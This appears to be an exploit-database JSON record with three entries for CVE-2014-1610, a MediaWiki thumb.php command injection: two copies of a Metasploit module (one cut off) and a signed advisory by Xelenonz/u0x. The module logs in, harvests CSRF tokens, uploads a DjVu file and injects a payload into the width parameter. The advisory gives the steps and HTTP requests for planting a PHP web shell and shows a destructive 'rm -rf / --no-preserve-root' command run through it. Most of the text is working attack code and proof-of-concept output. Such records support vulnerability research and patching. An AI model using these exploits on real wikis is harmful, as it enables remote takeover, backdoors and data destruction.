'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ], \n[ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ] \n], \n'Privileged' => false, \n'Targets' => \n[ \n[ 'Automatic PHP-CLI', \n{ \n'Payload' => \n{ \n'BadChars' => \"\\r\\n\", \n'PrependEncoder' => \"php -r \\\"\", \n'AppendEncoder' => \"\\\"\" \n}, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP \n} \n], \n[ 'Linux CMD', \n{ \n'Payload' => \n{ \n'BadChars' => \"\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl python php', \n} \n}, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD \n} \n], \n[ 'Windows CMD', \n{ \n'Payload' => \n{ \n'BadChars' => \"\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl', \n} \n}, \n'Platform' => ['win'], \n'Arch' => ARCH_CMD \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 28 2014')) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"Base MediaWiki path\", '/mediawiki' ]), \nOptString.new('FILENAME', [ false, \"Target DjVu/PDF file (e.g target.djvu target.pdf)\", nil ]), \nOptString.new('USERNAME', [ false, \"Username to authenticate with\", '' ]), \nOptString.new('PASSWORD', [ false, \"Password to authenticate with\", '' ]) \n], self.class) \nend \n \ndef get_version(body) \nmeta_generator = get_html_value(body, 'meta', 'generator', 'content') \n \nunless meta_generator \nvprint_status(\"No META Generator tag on #{full_uri}.\") \nreturn nil, nil, nil \nend \n \nif meta_generator && meta_generator =~ /mediawiki/i \nvprint_status(\"#{meta_generator} detected.\") \nmeta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/ \nmajor = $1.to_i \nminor = $2.to_i \npatch = $3.to_i \nvprint_status(\"Major:#{major} Minor:#{minor} Patch:#{patch}\") \n \nreturn major, minor, patch \nend \n \nreturn nil, nil, nil \nend \n \ndef check \nuri = target_uri.path \n \nopts = { 'uri' => normalize_uri(uri, 'index.php') } \n \nresponse = send_request_cgi!(opts) \n \nif opts['redirect_uri'] \nvprint_status(\"Redirected to #{opts['redirect_uri']}.\") \nend \n \nunless response \nvprint_status(\"No response from #{full_uri}.\") \nreturn CheckCode::Unknown \nend \n \n# Mediawiki will give a 404 for unknown pages but still have a body \nif response.code == 200 || response.code == 404 \nvprint_status(\"#{response.code} response received...\") \n \nmajor, minor, patch = get_version(response.body) \n \nunless major \nreturn CheckCode::Unknown \nend \n \nif major == 1 && (minor < 8 || minor > 22) \nreturn CheckCode::Safe \nelsif major == 1 && (minor == 22 && patch > 1) \nreturn CheckCode::Safe \nelsif major == 1 && (minor == 21 && patch > 4) \nreturn CheckCode::Safe \nelsif major == 1 && (minor == 19 && patch > 10) \nreturn CheckCode::Safe \nelsif major == 1 \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \nvprint_status(\"Received response code #{response.code} from #{full_uri}\") \nCheckCode::Unknown \nend \n \ndef exploit \nuri = target_uri.path \n \nprint_status(\"Grabbing version and login CSRF token...\") \nresponse = send_request_cgi({ \n'uri' => normalize_uri(uri, 'index.php'), \n'vars_get' => { 'title' => 'Special:UserLogin' } \n}) \n \nunless response \nfail_with(Failure::NotFound, \"Failed to retrieve webpage.\") \nend \n \nserver = response['Server'] \nif server && target.name =~ /automatic/i && server =~ /win32/i \nvprint_status(\"Windows platform detected: #{server}.\") \nmy_platform = Msf::Module::Platform::Windows \nelsif server && target.name =~ /automatic/i \nvprint_status(\"Nix platform detected: #{server}.\") \nmy_platform = Msf::Module::Platform::Unix \nelse \nmy_platform = target.platform.platforms.first \nend \n \n# If we have already identified a DjVu/PDF file on the server trigger \n# the exploit \nunless datastore['FILENAME'].blank? \npayload_request(uri, datastore['FILENAME'], my_platform) \nreturn \nend \n \nusername = datastore['USERNAME'] \npassword = datastore['PASSWORD'] \n \nmajor, minor, patch = get_version(response.body) \n \n# Upload CSRF added in v1.18.2 \n# http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1 \nif ((major == 1) && (minor == 18) && (patch == 0 || patch == 1)) \nupload_csrf = false \nelsif ((major == 1) && (minor < 18)) \nupload_csrf = false \nelse \nupload_csrf = true \nend \n \nsession_cookie = response.get_cookies \n \nwp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value') \n \nif wp_login_token.blank? \nfail_with(Failure::UnexpectedReply, \"Couldn't find login token. Is URI set correctly?\") \nelse \nprint_good(\"Retrieved login CSRF token.\") \nend \n \nprint_status(\"Attempting to login...\") \nlogin = send_request_cgi({ \n'uri' => normalize_uri(uri, 'index.php'), \n'method' => 'POST', \n'vars_get' => { \n'title' => 'Special:UserLogin', \n'action' => 'submitlogin', \n'type' => 'login' \n}, \n'cookie' => session_cookie, \n'vars_post' => { \n'wpName' => username, \n'wpPassword' => password, \n'wpLoginAttempt' => 'Log in', \n'wpLoginToken' => wp_login_token \n} \n}) \n \nif login and login.code == 302 \nprint_good(\"Log in successful.\") \nelse \nfail_with(Failure::NoAccess, \"Failed to log in.\") \nend \n \nauth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','') \n \n# Testing v1.15.1 it looks like it has session fixation \n# vulnerability so we dont get a new session cookie after \n# authenticating. Therefore we need to include our old cookie. \nunless auth_cookie.include? 'session=' \nauth_cookie << session_cookie \nend \n \nprint_status(\"Getting upload CSRF token...\") if upload_csrf \nupload_file = send_request_cgi({ \n'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'), \n'cookie' => auth_cookie \n}) \n \nunless upload_file and upload_file.code == 200 \nfail_with(Failure::NotFound, \"Failed to access file upload page.\") \nend \n \nwp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf \nwp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value') \ntitle = get_html_value(upload_file.body, 'input', 'title', 'value') \n \nif upload_csrf && wp_edit_token.blank? \nfail_with(Failure::UnexpectedReply, \"Couldn't find upload token. Is URI set correctly?\") \nelsif upload_csrf \nprint_good(\"Retrieved upload CSRF token.\") \nend \n \nupload_mime = Rex::MIME::Message.new \n \ndjvu_file = ::File.read(::File.join(Msf::Config.data_directory, \"exploits\", \"cve-2014-1610\", \"metasploit.djvu\")) \nfile_name = \"#{rand_text_alpha(4)}.djvu\" \n \nupload_mime.add_part(djvu_file, \"application/octet-stream\", \"binary\", \"form-data; name=\\\"wpUploadFile\\\"; filename=\\\"#{file_name}\\\"\") \nupload_mime.add_part(\"#{file_name}\", nil, nil, \"form-data; name=\\\"wpDestFile\\\"\") \nupload_mime.add_part(\"#{rand_text_alpha(4)}\", nil, nil, \"form-data; name=\\\"wpUploadDescription\\\"\") \nupload_mime.add_part(\"\", nil, nil, \"form-data; name=\\\"wpLicense\\\"\") \nupload_mime.add_part(\"1\",nil,nil, \"form-data; name=\\\"wpIgnoreWarning\\\"\") \nupload_mime.add_part(wp_edit_token, nil, nil, \"form-data; name=\\\"wpEditToken\\\"\") if upload_csrf \nupload_mime.add_part(title, nil, nil, \"form-data; name=\\\"title\\\"\") \nupload_mime.add_part(\"1\", nil, nil, \"form-data; name=\\\"wpDestFileWarningAck\\\"\") \nupload_mime.add_part(wp_upload, nil, nil, \"form-data; name=\\\"wpUpload\\\"\") \npost_data = upload_mime.to_s \n \nprint_status(\"Uploading DjVu file #{file_name}...\") \n \nupload = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'), \n'data' => post_data, \n'ctype' => \"multipart/form-data; boundary=#{upload_mime.bound}\", \n'cookie' => auth_cookie \n}) \n \nif upload and upload.code == 302 and upload.headers['Location'] \nlocation = upload.headers['Location'] \nprint_good(\"File uploaded to #{location}\") \nelse \nif upload.body.include? 'not a permitted file type' \nfail_with(Failure::NotVulnerable, \"Wiki is not configured for target files.\") \nelse \nfail_with(Failure::UnexpectedReply, \"Failed to upload file.\") \nend \nend \n \npayload_request(uri, file_name, my_platform) \nend \n \ndef payload_request(uri, file_name, my_platform) \nif my_platform == Msf::Module::Platform::Windows \ntrigger = \"1)&(#{payload.encoded})&\" \nelse \ntrigger = \"1;#{payload.encoded};\" \nend \n \nvars_get = { 'f' => file_name } \nif file_name.include? '.pdf' \nvars_get['width'] = trigger \nelsif file_name.include? '.djvu' \nvars_get['width'] = 1 \nvars_get['p'] = trigger \nelse \nfail_with(Failure::BadConfig, \"Unsupported file extension: #{file_name}\") \nend \n \nprint_status(\"Sending payload request...\") \nr = send_request_cgi({ \n'uri' => normalize_uri(uri, 'thumb.php'), \n'vars_get' => vars_get \n}, 1) \n \nif r && r.code == 404 && r.body =~ /not exist/ \nprint_error(\"File: #{file_name} does not exist.\") \nelsif r \nprint_error(\"Received response #{r.code}, exploit probably failed.\") \nend \nend \n \n# The order of name, value keeps shifting so regex is painful. \n# Cant use nokogiri due to security issues \n# Cant use REXML directly as its not strict XHTML \n# So we do a filthy mixture of regex and REXML \ndef get_html_value(html, type, name, value) \nreturn nil unless html \nreturn nil unless type \nreturn nil unless name \nreturn nil unless value \n \nfound = nil \nhtml.each_line do |line| \nif line =~ /(<#{type}[^\\/]*name=\"#{name}\".*?\\/>)/i \nfound = $& \nbreak \nend \nend \n \nif found \ndoc = REXML::Document.new found \nreturn doc.root.attributes[value] \nend \n \n'' \nend \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125287/mediawiki_thumb.rb.txt", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:15:32", "description": "", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "packetstorm", "title": "MediaWiki 1.22.1 PdfHandler Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2014-02-03T00:00:00", "id": "PACKETSTORM:125040", "href": "https://packetstormsecurity.com/files/125040/MediaWiki-1.22.1-PdfHandler-Remote-Code-Execution.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n#################################################################### \n# \n# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit \n(CVE-2014-1610) \n# Reported by Netanel Rubin - Check Point\u2019s Vulnerability Research Group \n(Jan 19, 2014) \n# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014) \n# Affected website : Wikipedia.org and more ! \n# \n# Exploit author : Xelenonz & @u0x (Pichaya Morimoto) \n# Release dates : Feb 1, 2014 \n# Special Thanks to 2600 Thailand ! \n# \n#################################################################### \n \n# Exploit: \n#################################################################### \n1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled) \nhttp://vulnerable-site/index.php/Special:Upload \n2. inject os cmd to upload a php-backdoor \nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20 \n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php` \n3. access to php-backdoor! \nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root \n4. happy pwning!! \n \n \n# Related files: \n#################################################################### \nthumb.php <-- extract all _GET array to params \n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width \noptions \n/includes/media/ImageHandler.php \n/includes/GlobalFunctions.php \n/includes/filerepo/file/File.php \n \n# Vulnerability Analysis: \n#################################################################### \n1. thumb.php \nThis script used to resize images if it is configured to be done \nwhen the web browser requests the image \n<? ... \n1.1 Called directly, use $_GET params \nwfThumbHandleRequest(); \n1.2 Handle a thumbnail request via query parameters \nfunction wfThumbHandleRequest() { \n$params = get_magic_quotes_gpc() \n? array_map( 'stripslashes', $_GET ) \n: $_GET; << WTF \n \nwfStreamThumb( $params ); // stream the thumbnail \n} \n1.3 Stream a thumbnail specified by parameters \nfunction wfStreamThumb( array $params ) { \n... \n$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts \nuploaded.pdf file here \n... \n// Backwards compatibility parameters \nif ( isset( $params['w'] ) ) { \n$params['width'] = $params['w']; // << Inject os cmd here! \nunset( $params['w'] ); \n} \n... \n$img = wfLocalFile( $fileName ); \n... \n// Thumbnail isn't already there, so create the new thumbnail... \n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image \nby width/height \n... \n// Stream the file if there were no errors \n$thumb->streamFile( $headers ); \n... \n?> \n2. /includes/filerepo/file/File.php \n<? ... \nfunction transform( $params, $flags = 0 ) { ... \n$handler = $this->getHandler(); // << PDF Handler \n... \n$normalisedParams = $params; \n$handler->normaliseParams( $this, $normalisedParams ); \n... \n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params ); \n.. \n?> \n3. /extensions/PdfHandler/PdfHandler_body.php \n<? ... \nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) { \n... \n$width = $params['width']; \n... \n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd & \nparameters \n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page} \n-dLastPage={$page}\"; \n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg( \n$srcPath ); \n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor ); \n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell \nargument \n$cmd .= wfEscapeShellArg( $dstPath ) . \")\"; \n$cmd .= \" 2>&1\"; \n... \n$err = wfShellExec( $cmd, $retval ); \n... \n?> \n4. /includes/GlobalFunctions.php \nExecute a shell command, with time and memory limits \n<? ... \nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits = \narray() ) { \n... \npassthru( $cmd, $retval ); // << Execute here!! \n \n# Proof-Of-Concept \n#################################################################### \nGET \n/mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C?php%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php` \nHTTP/1.1 \nHost: 127.0.0.1 \nConnection: keep-alive \nAccept: \ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \nAccept-Encoding: gzip,deflate,sdch \nAccept-Language: en-US,en;q=0.8 \nCookie: my_wikiUserID=2; my_wikiUserName=Longcat; \nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02 \n \n<html><head><title>Error generating thumbnail</title></head> \n<body> \n<h1>Error generating thumbnail</h1> \n<p> \n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br /> \nconvert: option requires an argument `-resize' @ \nerror/convert.c/ConvertImageCommand/2380.<br /> \nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br /> \n \n</p> \n \n</body> \n</html> \n \n \nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1 \nHost: 127.0.0.1 \nConnection: keep-alive \nAccept: \ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \nAccept-Encoding: gzip,deflate,sdch \nAccept-Language: en-US,en;q=0.8 \nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2; \nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1 \n \nuid=33(www-data) gid=33(www-data) groups=33(www-data) \n \n \n# Back-end $cmd \n#################################################################### \nGlobalFunctions.php : wfShellExec() \ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 \n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' | \n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php \nsystem(\\\\$_GET[1]);\">images/longcat.php` - \n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1 \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.14 (GNU/Linux) \n \niQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU \nBzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf \nny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1 \nmijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2 \nuCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb \nGO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv \nn2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh \nFXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt \nvuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ \nM0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan \nkumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR \n2LmeyQR2rzjBB7Sovvcn \n=ooEs \n-----END PGP SIGNATURE----- \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125040/mediawiki1221-exec.txt", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-01-05T03:27:22", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2014-02-20T00:00:00", "type": "zdt", "title": "MediaWiki Thumb.php Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2014-02-20T00:00:00", "id": "1337DAY-ID-21922", "href": "https://0day.today/exploit/description/21922", "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MediaWiki Thumb.php Remote Command Execution',\r\n 'Description' => %q{\r\n MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,\r\n when DjVu or PDF file upload support is enabled, allows remote unauthenticated\r\n users to execute arbitrary commands via shell metacharacters. If no target file\r\n is specified this module will attempt to log in with the provided credentials to\r\n upload a file (.DjVu) to use for exploitation.\r\n },\r\n 'Author' =>\r\n [\r\n 'Netanel Rubin', # from Check Point - Discovery\r\n 'Brandon Perry', # Metasploit Module\r\n 'Ben Harris', # Metasploit Module\r\n 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-1610' ],\r\n [ 'OSVDB', '102630'],\r\n [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],\r\n [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic PHP-CLI',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\r\\n\",\r\n 'PrependEncoder' => \"php -r \\\"\",\r\n 'AppendEncoder' => \"\\\"\"\r\n },\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP\r\n }\r\n ],\r\n [ 'Linux CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl python php',\r\n }\r\n },\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ],\r\n [ 'Windows CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl',\r\n }\r\n },\r\n 'Platform' => ['win'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jan 28 2014'))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"Base MediaWiki path\", '/mediawiki' ]),\r\n OptString.new('FILENAME', [ false, \"Target DjVu/PDF file (e.g target.djvu target.pdf)\", nil ]),\r\n OptString.new('USERNAME', [ false, \"Username to authenticate with\", '' ]),\r\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", '' ])\r\n ], self.class)\r\n end\r\n \r\n def get_version(body)\r\n meta_generator = get_html_value(body, 'meta', 'generator', 'content')\r\n \r\n unless meta_generator\r\n vprint_status(\"No META Generator tag on #{full_uri}.\")\r\n return nil, nil, nil\r\n end\r\n \r\n if meta_generator && meta_generator =~ /mediawiki/i\r\n vprint_status(\"#{meta_generator} detected.\")\r\n meta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/\r\n major = $1.to_i\r\n minor = $2.to_i\r\n patch = $3.to_i\r\n vprint_status(\"Major:#{major} Minor:#{minor} Patch:#{patch}\")\r\n \r\n return major, minor, patch\r\n end\r\n \r\n return nil, nil, nil\r\n end\r\n \r\n def check\r\n uri = target_uri.path\r\n \r\n opts = { 'uri' => normalize_uri(uri, 'index.php') }\r\n \r\n response = send_request_cgi!(opts)\r\n \r\n if opts['redirect_uri']\r\n vprint_status(\"Redirected to #{opts['redirect_uri']}.\")\r\n end\r\n \r\n unless response\r\n vprint_status(\"No response from #{full_uri}.\")\r\n return CheckCode::Unknown\r\n end\r\n \r\n # Mediawiki will give a 404 for unknown pages but still have a body\r\n if response.code == 200 || response.code == 404\r\n vprint_status(\"#{response.code} response received...\")\r\n \r\n major, minor, patch = get_version(response.body)\r\n \r\n unless major\r\n return CheckCode::Unknown\r\n end\r\n \r\n if major == 1 && (minor < 8 || minor > 22)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 22 && patch > 1)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 21 && patch > 4)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 19 && patch > 10)\r\n return CheckCode::Safe\r\n elsif major == 1\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n \r\n vprint_status(\"Received response code #{response.code} from #{full_uri}\")\r\n CheckCode::Unknown\r\n end\r\n \r\n def exploit\r\n uri = target_uri.path\r\n \r\n print_status(\"Grabbing version and login CSRF token...\")\r\n response = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'vars_get' => { 'title' => 'Special:UserLogin' }\r\n })\r\n \r\n unless response\r\n fail_with(Failure::NotFound, \"Failed to retrieve webpage.\")\r\n end\r\n \r\n server = response['Server']\r\n if server && target.name =~ /automatic/i && server =~ /win32/i\r\n vprint_status(\"Windows platform detected: #{server}.\")\r\n my_platform = Msf::Module::Platform::Windows\r\n elsif server && target.name =~ /automatic/i\r\n vprint_status(\"Nix platform detected: #{server}.\")\r\n my_platform = Msf::Module::Platform::Unix\r\n else\r\n my_platform = target.platform.platforms.first\r\n end\r\n \r\n # If we have already identified a DjVu/PDF file on the server trigger\r\n # the exploit\r\n unless datastore['FILENAME'].blank?\r\n payload_request(uri, datastore['FILENAME'], my_platform)\r\n return\r\n end\r\n \r\n username = datastore['USERNAME']\r\n password = datastore['PASSWORD']\r\n \r\n major, minor, patch = get_version(response.body)\r\n \r\n # Upload CSRF added in v1.18.2\r\n # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1\r\n if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))\r\n upload_csrf = false\r\n elsif ((major == 1) && (minor < 18))\r\n upload_csrf = false\r\n else\r\n upload_csrf = true\r\n end\r\n \r\n session_cookie = response.get_cookies\r\n \r\n wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')\r\n \r\n if wp_login_token.blank?\r\n fail_with(Failure::UnexpectedReply, \"Couldn't find login token. Is URI set correctly?\")\r\n else\r\n print_good(\"Retrieved login CSRF token.\")\r\n end\r\n \r\n print_status(\"Attempting to login...\")\r\n login = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'method' => 'POST',\r\n 'vars_get' => {\r\n 'title' => 'Special:UserLogin',\r\n 'action' => 'submitlogin',\r\n 'type' => 'login'\r\n },\r\n 'cookie' => session_cookie,\r\n 'vars_post' => {\r\n 'wpName' => username,\r\n 'wpPassword' => password,\r\n 'wpLoginAttempt' => 'Log in',\r\n 'wpLoginToken' => wp_login_token\r\n }\r\n })\r\n \r\n if login and login.code == 302\r\n print_good(\"Log in successful.\")\r\n else\r\n fail_with(Failure::NoAccess, \"Failed to log in.\")\r\n end\r\n \r\n auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')\r\n \r\n # Testing v1.15.1 it looks like it has session fixation\r\n # vulnerability so we dont get a new session cookie after\r\n # authenticating. Therefore we need to include our old cookie.\r\n unless auth_cookie.include? 'session='\r\n auth_cookie << session_cookie\r\n end\r\n \r\n print_status(\"Getting upload CSRF token...\") if upload_csrf\r\n upload_file = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'cookie' => auth_cookie\r\n })\r\n \r\n unless upload_file and upload_file.code == 200\r\n fail_with(Failure::NotFound, \"Failed to access file upload page.\")\r\n end\r\n \r\n wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf\r\n wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')\r\n title = get_html_value(upload_file.body, 'input', 'title', 'value')\r\n \r\n if upload_csrf && wp_edit_token.blank?\r\n fail_with(Failure::UnexpectedReply, \"Couldn't find upload token. Is URI set correctly?\")\r\n elsif upload_csrf\r\n print_good(\"Retrieved upload CSRF token.\")\r\n end\r\n \r\n upload_mime = Rex::MIME::Message.new\r\n \r\n djvu_file = ::File.read(::File.join(Msf::Config.data_directory, \"exploits\", \"cve-2014-1610\", \"metasploit.djvu\"))\r\n file_name = \"#{rand_text_alpha(4)}.djvu\"\r\n \r\n upload_mime.add_part(djvu_file, \"application/octet-stream\", \"binary\", \"form-data; name=\\\"wpUploadFile\\\"; filename=\\\"#{file_name}\\\"\")\r\n upload_mime.add_part(\"#{file_name}\", nil, nil, \"form-data; name=\\\"wpDestFile\\\"\")\r\n upload_mime.add_part(\"#{rand_text_alpha(4)}\", nil, nil, \"form-data; name=\\\"wpUploadDescription\\\"\")\r\n upload_mime.add_part(\"\", nil, nil, \"form-data; name=\\\"wpLicense\\\"\")\r\n upload_mime.add_part(\"1\",nil,nil, \"form-data; name=\\\"wpIgnoreWarning\\\"\")\r\n upload_mime.add_part(wp_edit_token, nil, nil, \"form-data; name=\\\"wpEditToken\\\"\") if upload_csrf\r\n upload_mime.add_part(title, nil, nil, \"form-data; name=\\\"title\\\"\")\r\n upload_mime.add_part(\"1\", nil, nil, \"form-data; name=\\\"wpDestFileWarningAck\\\"\")\r\n upload_mime.add_part(wp_upload, nil, nil, \"form-data; name=\\\"wpUpload\\\"\")\r\n post_data = upload_mime.to_s\r\n \r\n print_status(\"Uploading DjVu file #{file_name}...\")\r\n \r\n upload = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'data' => post_data,\r\n 'ctype' => \"multipart/form-data; boundary=#{upload_mime.bound}\",\r\n 'cookie' => auth_cookie\r\n })\r\n \r\n if upload and upload.code == 302 and upload.headers['Location']\r\n location = upload.headers['Location']\r\n print_good(\"File uploaded to #{location}\")\r\n else\r\n if upload.body.include? 'not a permitted file type'\r\n fail_with(Failure::NotVulnerable, \"Wiki is not configured for target files.\")\r\n else\r\n fail_with(Failure::UnexpectedReply, \"Failed to upload file.\")\r\n end\r\n end\r\n \r\n payload_request(uri, file_name, my_platform)\r\n end\r\n \r\n def payload_request(uri, file_name, my_platform)\r\n if my_platform == Msf::Module::Platform::Windows\r\n trigger = \"1)&(#{payload.encoded})&\"\r\n else\r\n trigger = \"1;#{payload.encoded};\"\r\n end\r\n \r\n vars_get = { 'f' => file_name }\r\n if file_name.include? '.pdf'\r\n vars_get['width'] = trigger\r\n elsif file_name.include? '.djvu'\r\n vars_get['width'] = 1\r\n vars_get['p'] = trigger\r\n else\r\n fail_with(Failure::BadConfig, \"Unsupported file extension: #{file_name}\")\r\n end\r\n \r\n print_status(\"Sending payload request...\")\r\n r = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'thumb.php'),\r\n 'vars_get' => vars_get\r\n }, 1)\r\n \r\n if r && r.code == 404 && r.body =~ /not exist/\r\n print_error(\"File: #{file_name} does not exist.\")\r\n elsif r\r\n print_error(\"Received response #{r.code}, exploit probably failed.\")\r\n end\r\n end\r\n \r\n # The order of name, value keeps shifting so regex is painful.\r\n # Cant use nokogiri due to security issues\r\n # Cant use REXML directly as its not strict XHTML\r\n # So we do a filthy mixture of regex and REXML\r\n def get_html_value(html, type, name, 